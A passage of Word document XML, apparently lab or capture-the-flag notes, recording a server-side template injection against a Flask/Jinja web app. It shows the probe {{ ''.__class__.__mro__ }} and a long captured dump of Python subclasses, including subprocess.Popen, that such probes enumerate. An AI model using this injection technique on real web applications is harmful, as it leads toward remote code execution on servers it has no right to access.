      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;a&gt;C:\&gt;&lt;input type="text" name="cmd" id="command"&gt;&lt;/a&gt;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&lt;a&gt;[&amp;lt;class &amp;#39;type&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;weakref&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;weakcallableproxy&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;weakproxy&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;int&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;bytearray&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;bytes&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;list&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;NoneType&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;NotImplementedType&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;traceback&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;super&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;range&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;dict&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;dict_keys&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;dict_values&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;dict_items&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;dict_reversekeyiterator&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;dict_reversevalueiterator&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;dict_reverseitemiterator&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;odict_iterator&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;set&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;str&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;slice&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;staticmethod&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;complex&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;float&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;frozenset&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;property&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;managedbuffer&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;memoryview&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;tuple&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;enumerate&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;reversed&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;stderrprinter&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;code&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;frame&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;builtin_function_or_method&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;method&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;function&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;mappingproxy&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;generator&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;getset_descriptor&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;wrapper_descriptor&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;method-wrapper&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;ellipsis&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;member_descriptor&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;types.SimpleNamespace&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;PyCapsule&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;longrange_iterator&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;cell&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;instancemethod&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;classmethod_descriptor&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;method_descriptor&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;callable_iterator&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;iterator&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;pickle.PickleBuffer&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;coroutine&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;coroutine_wrapper&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;InterpreterID&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;EncodingMap&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;fieldnameiterator&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;formatteriterator&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;BaseException&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;hamt&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;hamt_array_node&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;hamt_bitmap_node&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;hamt_collision_node&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;keys&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;values&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;items&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;Context&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;ContextVar&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;Token&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;Token.MISSING&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;moduledef&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;module&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;filter&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;map&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;zip&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_frozen_importlib._ModuleLock&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_frozen_importlib._DummyModuleLock&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_frozen_importlib._ModuleLockManager&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_frozen_importlib.ModuleSpec&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_frozen_importlib.BuiltinImporter&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;classmethod&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_frozen_importlib.FrozenImporter&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_frozen_importlib._ImportLockContext&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_thread._localdummy&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_thread._local&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_thread.lock&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_thread.RLock&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_io._IOBase&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_io._BytesIOBuffer&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_io.IncrementalNewlineDecoder&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;posix.ScandirIterator&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;posix.DirEntry&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_frozen_importlib_external.WindowsRegistryFinder&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_frozen_importlib_external._LoaderBasics&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_frozen_importlib_external.FileLoader&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_frozen_importlib_external._NamespacePath&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_frozen_importlib_external._NamespaceLoader&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_frozen_importlib_external.PathFinder&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_frozen_importlib_external.FileFinder&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;zipimport.zipimporter&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;zipimport._ZipImportResourceReader&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;codecs.Codec&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;codecs.IncrementalEncoder&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;codecs.IncrementalDecoder&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;codecs.StreamReaderWriter&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;codecs.StreamRecoder&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_abc_data&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;abc.ABC&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;dict_itemiterator&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;collections.abc.Hashable&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;collections.abc.Awaitable&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;collections.abc.AsyncIterable&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;async_generator&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;collections.abc.Iterable&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;bytes_iterator&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;bytearray_iterator&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;dict_keyiterator&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;dict_valueiterator&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;list_iterator&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;list_reverseiterator&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;range_iterator&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;set_iterator&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;str_iterator&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;tuple_iterator&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;collections.abc.Sized&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;collections.abc.Container&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;collections.abc.Callable&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;os._wrap_close&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_sitebuiltins.Quitter&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_sitebuiltins._Printer&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_sitebuiltins._Helper&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;operator.itemgetter&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;operator.attrgetter&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;operator.methodcaller&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;itertools.accumulate&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;itertools.combinations&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;itertools.combinations_with_replacement&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;itertools.cycle&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;itertools.dropwhile&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;itertools.takewhile&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;itertools.islice&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;itertools.starmap&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;itertools.chain&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;itertools.compress&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;itertools.filterfalse&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;itertools.count&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;itertools.zip_longest&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;itertools.permutations&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;itertools.product&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;itertools.repeat&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;itertools.groupby&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;itertools._grouper&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;itertools._tee&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;itertools._tee_dataobject&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;reprlib.Repr&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;collections.deque&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_collections._deque_iterator&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_collections._deque_reverse_iterator&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_collections._tuplegetter&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;collections._Link&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;functools.partial&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;functools._lru_cache_wrapper&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;functools.partialmethod&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;functools.singledispatchmethod&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;functools.cached_property&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;types.DynamicClassAttribute&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;types._GeneratorWrapper&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;enum.auto&amp;#39;&amp;gt;, &amp;lt;enum &amp;#39;Enum&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;re.Pattern&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;re.Match&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_sre.SRE_Scanner&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;sre_parse.State&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;sre_parse.SubPattern&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;sre_parse.Tokenizer&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;re.Scanner&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;string.Template&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;string.Formatter&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;contextlib.ContextDecorator&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;contextlib._GeneratorContextManagerBase&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;contextlib._BaseExitStack&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;typing._Final&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;typing._Immutable&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;typing.Generic&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;typing._TypingEmpty&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;typing._TypingEllipsis&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;typing.NamedTuple&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;typing.io&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;typing.re&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_ast.AST&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;markupsafe._MarkupEscapeHelper&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;select.poll&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;select.epoll&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;selectors.BaseSelector&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_socket.socket&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_weakrefset._IterationGuard&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_weakrefset.WeakSet&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;threading._RLock&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;threading.Condition&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;threading.Semaphore&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;threading.Event&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;threading.Barrier&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;threading.Thread&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;socketserver.BaseServer&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;socketserver.ForkingMixIn&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;socketserver._NoThreads&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;socketserver.ThreadingMixIn&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;socketserver.BaseRequestHandler&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;warnings.WarningMessage&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;warnings.catch_warnings&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;datetime.date&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;datetime.timedelta&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;datetime.time&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;datetime.tzinfo&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;weakref.finalize._Info&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;weakref.finalize&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_sha512.sha384&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_sha512.sha512&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_random.Random&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;urllib.parse._ResultMixinStr&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;urllib.parse._ResultMixinBytes&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;urllib.parse._NetlocResultMixinBase&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;calendar._localized_month&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;calendar._localized_day&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;calendar.Calendar&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;calendar.different_locale&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;email._parseaddr.AddrlistClass&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;Struct&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;unpack_iterator&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;email.charset.Charset&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;email.header.Header&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;email.header._ValueFormatter&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;email._policybase._PolicyBase&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;email.feedparser.BufferedSubFile&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;email.feedparser.FeedParser&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;email.parser.Parser&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;email.parser.BytesParser&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;email.message.Message&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;http.client.HTTPConnection&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_ssl._SSLContext&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_ssl._SSLSocket&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_ssl.MemoryBIO&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_ssl.Session&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;ssl.SSLObject&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;mimetypes.MimeTypes&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;zlib.Compress&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;zlib.Decompress&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_bz2.BZ2Compressor&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_bz2.BZ2Decompressor&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_lzma.LZMACompressor&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_lzma.LZMADecompressor&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;dis.Bytecode&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;tokenize.Untokenizer&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;inspect.BlockFinder&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;inspect._void&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;inspect._empty&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;inspect.Parameter&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;inspect.BoundArguments&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;inspect.Signature&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;traceback.FrameSummary&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;traceback.TracebackException&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;logging.LogRecord&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;logging.PercentStyle&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;logging.Formatter&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;logging.BufferingFormatter&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;logging.Filter&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;logging.Filterer&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;logging.PlaceHolder&amp;#39;&amp;gt;, &amp;lt;class {{ ''.__class__.__mro__ }}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&amp;#39;logging.Manager&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;logging.LoggerAdapter&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug._internal._Missing&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.exceptions.Aborter&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.urls.Href&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;subprocess.CompletedProcess&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;subprocess.Popen&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_hashlib.HASH&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_blake2.blake2b&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_blake2.blake2s&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_sha3.sha3_224&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_sha3.sha3_256&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_sha3.sha3_384&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_sha3.sha3_512&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_sha3.shake_128&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_sha3.shake_256&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;tempfile._RandomNameSequence&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;tempfile._TemporaryFileCloser&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;tempfile._TemporaryFileWrapper&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;tempfile.SpooledTemporaryFile&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;tempfile.TemporaryDirectory&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;urllib.request.Request&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;urllib.request.OpenerDirector&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;urllib.request.BaseHandler&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;urllib.request.HTTPPasswordMgr&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;urllib.request.AbstractBasicAuthHandler&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;urllib.request.AbstractDigestAuthHandler&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;urllib.request.URLopener&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;urllib.request.ftpwrapper&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;http.cookiejar.Cookie&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;http.cookiejar.CookiePolicy&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;http.cookiejar.Absent&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;http.cookiejar.CookieJar&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.datastructures.ImmutableListMixin&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.datastructures.ImmutableDictMixin&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.datastructures._omd_bucket&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.datastructures.Headers&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.datastructures.ImmutableHeadersMixin&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.datastructures.IfRange&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.datastructures.Range&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.datastructures.ContentRange&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.datastructures.FileStorage&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;dataclasses._HAS_DEFAULT_FACTORY_CLASS&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;dataclasses._MISSING_TYPE&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;dataclasses._FIELD_BASE&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;dataclasses.InitVar&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;dataclasses.Field&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;dataclasses._DataclassParams&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.sansio.multipart.Event&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.sansio.multipart.MultipartDecoder&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.sansio.multipart.MultipartEncoder&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;importlib.abc.Finder&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;importlib.abc.Loader&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;importlib.abc.ResourceReader&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;pkgutil.ImpImporter&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;pkgutil.ImpLoader&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;hmac.HMAC&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.wsgi.ClosingIterator&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.wsgi.FileWrapper&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.wsgi._RangeWrapper&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.utils.HTMLBuilder&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.wrappers.accept.AcceptMixin&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.wrappers.auth.AuthorizationMixin&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.wrappers.auth.WWWAuthenticateMixin&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_json.Scanner&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_json.Encoder&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;json.decoder.JSONDecoder&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;json.encoder.JSONEncoder&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.formparser.FormDataParser&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.formparser.MultiPartParser&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.user_agent.UserAgent&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.useragents._UserAgentParser&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.sansio.request.Request&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.wrappers.request.StreamOnlyMixin&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.sansio.response.Response&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.wrappers.response.ResponseStream&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.wrappers.response.ResponseStreamMixin&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.wrappers.common_descriptors.CommonRequestDescriptorsMixin&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.wrappers.common_descriptors.CommonResponseDescriptorsMixin&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.wrappers.etag.ETagRequestMixin&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.wrappers.etag.ETagResponseMixin&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.wrappers.user_agent.UserAgentMixin&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.test._TestCookieHeaders&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.test._TestCookieResponse&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.test.EnvironBuilder&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;werkzeug.test.Client&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;decimal.Decimal&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;decimal.Context&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;decimal.SignalDictMixin&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;decimal.ContextManager&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;numbers.Number&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;uuid.UUID&amp;#39;&amp;gt;, &amp;lt;class &amp;#39;_pickle.Unpickler&amp;#39;&amp;gt;, &amp;lt;class 